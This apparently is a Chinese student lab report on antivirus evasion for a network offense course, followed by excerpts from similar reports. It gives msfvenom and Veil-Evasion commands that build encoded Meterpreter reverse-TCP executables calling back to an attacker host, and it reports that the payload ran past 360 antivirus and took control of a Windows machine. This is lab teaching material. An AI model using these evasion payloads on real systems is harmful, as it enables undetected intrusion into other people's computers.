20155324《网络对抗》免杀原理与实践(代码片段)

20155324 20155324     2022-11-02     738

关键词:

20155324《网络对抗》免杀原理与实践

免杀原理

实验内容

(1)理解免杀技术原理

(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;

(3)通过组合应用各种技术实现恶意代码免杀

(4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 正常行为分析法:正常行为分析常被应用于异常检测之中,是指对程序的正常行为轮廓进行分析和表示,为程序建立一个安全行为库,当被监测程序的实际行为与其安全行为库中的正常行为不一致或存在一定差异时,则可能为恶意代码
  • 特征检测法:系统分析获取恶意代码通常具有明显特征码,当检测到代码含有特征码则可能为恶意代码

(2)免杀是做什么?

  • 免杀是不会被杀毒软件软件杀掉的病毒或木马 是病毒的制作人 为了不让病毒被识别出来 通过钻杀毒软件漏洞或者将病毒伪装成正常程序的办法 来逃避杀毒软件的查杀

(3)免杀的基本方法有哪些?

  • 修改特征码:对恶意代码的特征码进行修改,比如添加一些指令,让杀软无法识别其是否为恶意代码
  • 加花:通过添加加花指令(一些垃圾指令,类似加1减1之类的无用语句)让杀毒软件检测不到特征码。加花可以分为加区加花和去头加花
  • 加壳:给原程序加上一段保护程序,有保护和加密功能,运行加壳后的文件先运行壳再运行真实文件,从而起到保护作用

正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

有18个杀毒软件查出来了。扫描结果:46%的杀软(18/39)报告发现病毒

msf用编码器生成执行文件 编码一次

Kali输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\\x00’ LHOST=kali的IP LPORT=5324端口号 -f exe >自己起后门名字.exe

再次


使用Veil-Evasion重新编写源代码

在Kali中安装veil,sudo apt-get install veil

  • 在Kali的终端中启动Veil-Evasion
    命令行中输入veil,后在veil中输入命令use evasion
    依次输入如下命令生成你的可执行文件:
use python/meterpreter/rev_tcp.py(设置payload)

set LHOST Kali的IP(设置反弹连接IP)
set LPORT 端口号(设置反弹端口)

generate
可执行文件名

选择使用语言来编写

利用shellcode编程实现免杀

  • 首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。

  • VS编译运行产生exe文件(exe文件名不能存在20155324这样的学号)

实测优化版本、回连成功

按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软(Win安装360 )的情况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限

实验总结

通过本次实验让我进一步了解了病毒的可怕,竟然都能通过360的检查,真是太恐怖了。还是自己做的很有成就感!希望在以后的学习中能够更多的学到这些知识。

20145309《网络对抗技术》免杀原理与实践

20145309《网络对抗技术》免杀原理与实践1.基础问题回答(1)杀软是如何检测出恶意代码的?根据特征来检测:对已存在的流行代码特征的提取与比对根据行为来检测:是否有更改注册表行为、是否有设置自启动、是否有修改权... 查看详情

20145239杜文超《网络对抗》-免杀原理与实践

《网络对抗》-免杀原理与实践基础问题回答(1)杀软是如何检测出恶意代码的?根据搜集来的最全的、最新的特征码库,检测程序有没有异常或者可疑的行为。(2)免杀是做什么?利用一些手段,让你的的后门不被AV软件发现... 查看详情

20154307《网络对抗》exp3免杀原理与实践(代码片段)

20154307《网络对抗》Exp3免杀原理与实践一、基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。启发式恶意软件... 查看详情

20145331魏澍琛《网络对抗》——免杀原理与实践

20145331魏澍琛《网络对抗》——免杀原理与实践问题回答1、杀软是如何检测出恶意代码的?一个是基于特征码的检测,第二个是启发式恶意软件检测,最后是基于行为的恶意软件检测2、免杀是做什么?让病毒不被杀毒软件kill掉3... 查看详情

2017-2018-2《网络对抗技术》20155322exp3免杀原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322Exp3免杀原理与实践[-=博客目录=-]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-正确使用msf编码器2.2-veil-evasion2.3-组合应用技术实现免杀2.4-靶机实测2.5-基础问题回答3-资料1-实践目... 查看详情

20165218《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用VirusTotal或Viscan网站扫描后门程序VirusTotalViscan免杀工具1——msfvenom使用编码器-使用msfvenom命... 查看详情

20155302《网络对抗》exp3免杀原理与实践

20155302《网络对抗》Exp3免杀原理与实践实验要求1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)2.通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了... 查看详情

20155232《网络对抗》exp3免杀原理与实践(代码片段)

20155232《网络对抗》Exp3免杀原理与实践问题回答1.基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测特征码:一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据... 查看详情

2017-2018-220155225《网络对抗技术》实验三免杀原理与实践(代码片段)

2017-2018-220155225《网络对抗技术》实验三免杀原理与实践免杀工具1——msfvenom使用编码器知道msfvenom的编码原理,就知道不管迭代编码多少次都没用,总有一段译码指令在头部,这个头部就在特征库里,一下就检测出来了。但还是... 查看详情

20155218《网络对抗》exp3免杀原理与实践(代码片段)

20155218《网络对抗》Exp3免杀原理与实践一、使用msf生成后门程序的检测(1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下:(2)使用msf时对它多编码1次并进行测试发现能发现的杀软变少;(3)使用msf时对它多编... 查看详情

2018-2019-220165114《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践目录一、实验内容二、基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?三、实践过程记录正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用... 查看详情

2017-2018-420155317《网络对抗技术》exp3免杀原理与实践

2017-2018-420155317《网络对抗技术》EXP3免杀原理与实践一、问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?2.实践(1)正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,... 查看详情

2018-2019-2网络对抗技术201652287exp3免杀原理与实践(代码片段)

2018-2019-2网络对抗技术201652287Exp3免杀原理与实践**免杀**-一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。-要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-viru... 查看详情

2018-2019-2网络对抗技术20165228exp3免杀原理与实践(代码片段)

2018-2019-2网络对抗技术20165228Exp3免杀原理与实践免杀一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是... 查看详情

2018~2019-420165107网络对抗技术exp3免杀原理与实践(代码片段)

20165107Exp3免杀原理与实践实验要求1、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧2、通过组合应用各种技术实现恶意代码免杀3、用另一电脑实测,在杀软开... 查看详情

网络对抗exp3免杀原理与实践20154311王卓然(代码片段)

Exp3免杀原理与实践 一、基础问题回答(1)杀软是如何检测出恶意代码的?      ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶... 查看详情

2018-2019-2网络对抗技术20165314exp3免杀原理与实践(代码片段)

免杀原理与实践说明一、实验说明任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)任务二:通过组合应用各种技术实现恶意代码免杀(1分)任务三:用另一... 查看详情

20165101刘天野2018-2019-2《网络对抗技术》exp3免杀原理与实践(代码片段)

20165101刘天野2018-2019-2《网络对抗技术》Exp3免杀原理与实践1.实践内容1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧1.1.1使用msf编码器输入命令msfvenom-h可查看相关用法:... 查看详情